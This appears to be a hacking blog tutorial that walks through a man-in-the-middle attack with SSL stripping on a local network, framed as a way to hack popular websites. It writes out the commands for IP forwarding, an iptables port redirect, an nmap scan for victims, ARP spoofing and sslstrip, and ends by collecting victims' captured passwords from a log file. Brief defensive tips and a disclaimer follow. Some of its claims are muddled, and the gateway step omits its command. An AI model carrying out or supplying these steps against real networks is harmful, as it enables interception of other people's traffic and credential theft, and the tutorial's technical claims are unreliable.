I know many of you are reading this article because you have heard about how an SSL Strip attack combined with a man in the middle attack can help you hack popular websites like facebook, snapchat twitter, etc. But the problem is many people do not know what a man in the middle attack means and how to use it. So with this tutorial, you will learn the basics of how to do a man in the middle attack with an SSL strip.
What is a man in the middle attack with an SSL strip?
This answer has two parts:
Man in the middle attack:
This is a network-based attack where you become a proxy between the victim and the webpage they are trying to visit. With this setup, you can spy on the traffic on the target activities and network traffic.
This is an advanced form of manipulating internet protocol to strip and remove the SSL configuration present on the websites. In other words, turn a secure https website into an http vulnerable website, making all the traffic and sensitive information being transferred as plain text. In other words, passwords can now be easily captured in plain text along with other information like credit card numbers, etc.
Combining both MITM and SSL STRIP:
When you combine both the attacks (MITM attack with SSLStrip), you can easily convert HTTPS traffic to HTTP and intercept the HTTP traffic by hijacking the network. Our attack will look for HTTPS links and redirects them to HTTP, making the connection vulnerable and insecure.
Must read: How to hack routers with routersploit
DISCLAIMER: This is an educational article meant to aware and educates readers about the hacks. Do not use this tool or website on any website. Do not apply or execute any method or use tools without concern of the party. The hackingworld.com team will not be in any way responsible for any illegal activities and usage of tools by you. We want to make readers aware of active threats and how they work. Use this article only for educational purposes.
So let’s start Stripping off SSL with MITM
So to use this network-based attack, you need to gather and set up the following things:
- The victim must be on the same network as you for this attack to work.
- The victim’s IP address
- This victim must be using Internet Explorer
- Your IP address
- Kali Linux installed and updated
I am hoping you have done the necessary setup to make sure you have gathered the above things as told.
To know your IP on Kali Linux, just type “ifconfig.”
Step1: We need to set up IP forwarding for man in the middle attack
To set your machine in IP forwarding mode so that you can do a man in the middle attack type the following command
echo 1 > /proc/sys/net/ipv4/ip_forward
Step2: Now set up iptables to redirect HTTPS to HTTP
To set up iptables to redirect traffic from port 80 to port 8080 to ensure outgoing connections are redirected with sslstrip and attack can be successful type the following command.
iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 8080
Step 3: Find your network gateway
To find your Network Gateway type the following command in the Kali Linux terminal.
Step4: Find the targets IP Address
As mentioned before, we need to find our target machine IP address for this attack to work. We will use nmap to find the target IP address:
nmap -sS -O 192.168.xx.xx/24
xx.xx = replace with the gateway IP address
Step 5: Arpspoof the target system
ARP spoofing is a network manipulation technique by which a hacker sends (spoofed) Address Resolution Protocol (ARP) messages onto the local network (LAN). To do this type the following command.
arpspoof -i eth0 -t 192.168.yy.yy 192.168.xx.xx
192.168.yy.yy ( IP address of the victim )
192.168.xx.xx ( IP address of the gateway router )
Step 6: Start the SSLSTRIP attack on the target
Now for SSLSTRIP, we need to listen to port 8080. To do this, open a new terminal and type the following command.
sslstrip -l 8080
Step 7: Waiting for the victim
Now for this tutorial, I will be the victim as well as the attacker. I will use windows virtual machine. So once my machine is compromised for Eg type facebook.com in the internet explorer browser. Facebook, which should go with HTTPS, will instead go through HTTP.
So, in other words, whenever the victim opens their browser (Internet Explorer) and visits a website on the internet, their traffic will be redirected to us.
Step 8: Check the rewards
Now go to the Home folder in Kali Linux and check for sslstrip.log file. We can find the username and password victim entered because of the man in the middle attack with the SSL strip.
As you can imagine, this a huge security risk. Simply put, its a nightmare for regular people. And the worst part is they do not even know that they have been hacked.
Why, you ask?
This is a huge security threat because as soon as the website becomes an http based website. All your traffic becomes plain text. The encryption is gone, and anyone can read your chats, and the data which is transferred via your machine is now accessible to all on the same network as you.
The example is above where the victim visits Facebook.com, but the website is an http website and not HTTPS. As you can guess, SSL encryption is missing from the page, and all the traffic is easy to see and intercept.
This vulnerability can expose all our passwords to hackers listening on the same network. The scary thing about this whole process is that the target user will not even realize that the network is compromised, and their traffic is vulnerable.
How can I be secure from MITM and SSL strip attacks?
The first thing we need to target is the main vulnerability, which is Internet explorer.
DO NOT USE INTERNET EXPLORER as a browser. Switch to Chrome and Mozilla Firefox as your main browsers. They have inbuilt security features that check the traffic and warn for suspicious activity.
- Use security add-ons like “ HTTPS everywhere ” in chrome and firefox browsers. HTTPS Everywhere (Mozilla Firefox) & HTTPS Everywhere (Google Chrome)
- Update your browser to the latest version
- Update your OS
- Use a good antivirus
Commonly asked questions about Man in the middle attack and sslstrip?
Q1. Is using this attack on public wifi legal?
No, it not. It is only for testing purposes. This article is an educational article; please use it with the same intent.
Q2. Can I hack anyone over the internet?
No, this attack words when both the attacker and the victim are on the same network.
Q3. Can I hack android devices with this attack?
Nope, not to my knowledge. Some very old browsers may be vulnerable, but mostly everyone uses chrome or firefox on android, so you should be safe.
Q.4 What is a gateway IP address?
It is the IP address of the router, which is the main gateway for the internet connection. Your TP-link, D-link, etc. routers are the main examples.
Q.5 Why does Microsoft not fix this issue?
I have no clue why internet explorer is still there in windows. It is a disaster waiting to happen. EDGE is comparatively safer. However, I prefer Chrome and Mozilla Firefox as the default choices.
Q.6 Can I use this attack with an android device?
I hope you liked the article share and support the website. You can always donate and support us to write new content.